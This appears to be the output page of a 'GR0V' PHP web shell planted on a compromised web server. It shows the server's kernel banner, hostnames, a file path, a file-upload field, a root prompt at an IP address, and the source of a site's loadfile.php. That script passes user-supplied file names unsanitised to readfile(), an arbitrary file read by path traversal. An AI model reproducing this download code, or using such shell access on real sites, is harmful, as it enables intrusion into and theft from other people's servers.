? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/domains/happytokorea.com/private_html/
File Upload :
Current File : /home/admin/domains/happytokorea.com/private_html/loadfile.php

<?php
if($_GET['ty']==2){
	$file_url = 'backend/images/ContentPdf/'.$_GET['fileP'];
}else{
	if($_GET['fileP'] <> ""){
		$file_url = 'tour/pdf/'.$_GET['fileP'];
	}else{
		$file_url = 'tour/word/'.$_GET['fileW'];
	}
}
header('Content-Type: application/octet-stream');

header("Content-Transfer-Encoding: Binary");

header("Content-disposition: attachment; filename=\"" . basename($file_url) . "\"");

readfile($file_url);

exit();
?>

T1KUS90T
  root-grov@210.1.60.28:~$